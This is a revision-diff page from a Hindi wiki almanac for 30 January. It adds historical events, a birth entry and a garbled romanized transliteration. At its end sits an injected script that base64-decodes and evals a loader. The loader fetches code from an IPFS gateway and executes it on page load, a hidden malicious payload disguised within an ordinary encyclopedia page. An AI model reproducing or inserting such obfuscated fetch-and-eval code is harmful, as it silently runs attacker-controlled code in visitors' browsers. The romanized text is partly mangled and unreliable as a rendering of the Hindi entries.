Difference between revisions of "30 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 4: Line 4:
  
 
==30 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
==30 जनवरी की महत्त्वपूर्ण घटनाएँ==
 +
* 1649 - [[इंग्लैंड]] के सम्राट 'चार्ल्स प्रथम' को फ़ांसी दी गई।
 +
* 1790 - लाइफ़बोट के तौर पर निर्मित पहली नाव का टायन नदी में परीक्षण।
 +
* [[1902]] - पहली आंग्ल-जापानी संधि पर [[लंदन]] में हस्ताक्षर।
 +
* [[1911]] - 'कैनेडियन नेवल सर्विस' का नाम बदलकर 'रॉयल कैनेडियन नेवी' किया गया।
 +
* [[1913]] - 'हाउस आफ़ लॉर्ड्स' ने आइरिश होम रूल बिल को ख़ारिज किया।
 +
* [[1933]] - एडॉल्फ़ हिटलर ने आधिकारिक रूप से [[जर्मनी]] के चांसलर की कमान सम्भाली।
 +
* [[1972]] - [[पाकिस्तान]] ने 'राष्ट्रमंडल' से अपना नाम वापस लिया।
 
* [[2008]]- [[चेन्नई]] की एक विशेष अदालत ने बहुचर्चित स्टाम्प घोटाले के मामले के मुख्य आरोपी अब्दुल करीम तेलगी को 10 साल की सज़ा सुनाई।
 
* [[2008]]- [[चेन्नई]] की एक विशेष अदालत ने बहुचर्चित स्टाम्प घोटाले के मामले के मुख्य आरोपी अब्दुल करीम तेलगी को 10 साल की सज़ा सुनाई।
 
* [[2009]]- आस्ट्रेलिया ओपन के मिक्स्ड डबल मुक़ाबले में [[सानिया मिर्ज़ा]] व [[महेश भूपति]] की जोड़ी फाइनल में पहुँची।  
 
* [[2009]]- आस्ट्रेलिया ओपन के मिक्स्ड डबल मुक़ाबले में [[सानिया मिर्ज़ा]] व [[महेश भूपति]] की जोड़ी फाइनल में पहुँची।  
 
==30 जनवरी को जन्मे व्यक्ति==
 
==30 जनवरी को जन्मे व्यक्ति==
 
* [[1890]] - [[जयशंकर प्रसाद]] - हिन्दी साहित्यकार, प्रमुख रचनाएँ- कामायनी, चन्द्रगुप्त
 
* [[1890]] - [[जयशंकर प्रसाद]] - हिन्दी साहित्यकार, प्रमुख रचनाएँ- कामायनी, चन्द्रगुप्त
 
+
* [[1927]] - ओलोफ़ पाल्मे का जन्म।
 
==30 जनवरी को हुए निधन==
 
==30 जनवरी को हुए निधन==
 
* [[1948]] - [[महात्मा गाँधी]] - [[भारत]] के राष्ट्रपिता
 
* [[1948]] - [[महात्मा गाँधी]] - [[भारत]] के राष्ट्रपिता

Revision as of 04:12, 4 February 2012


gregori kailandar ke anusar 30 janavari varsh ka 30 vaan din hai. sal mean abhi aur 335 din shesh haian. (lip varsh mean 336 din)

30 janavari ki mahattvapoorn ghatanaean

  • 1649 - ianglaiand ke samrat 'charls pratham' ko faansi di gee.
  • 1790 - laifabot ke taur par nirmit pahali nav ka tayan nadi mean parikshan.
  • 1902 - pahali aangl-japani sandhi par landan mean hastakshar.
  • 1911 - 'kainediyan neval sarvis' ka nam badalakar 'r aauyal kainediyan nevi' kiya gaya.
  • 1913 - 'haus af l aaurds' ne airish hom rool bil ko kharij kiya.
  • 1933 - ed aaulf hitalar ne adhikarik roop se jarmani ke chaansalar ki kaman sambhali.
  • 1972 - pakistan ne 'rashtramandal' se apana nam vapas liya.
  • 2008- chennee ki ek vishesh adalat ne bahucharchit stamp ghotale ke mamale ke mukhy aropi abdul karim telagi ko 10 sal ki saza sunaee.
  • 2009- astreliya opan ke miksd dabal muqabale mean saniya mirza v mahesh bhoopati ki jo di phainal mean pahuanchi.

30 janavari ko janme vyakti

30 janavari ko hue nidhan

30 janavari ke mahattvapoorn avasar evan utsav

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>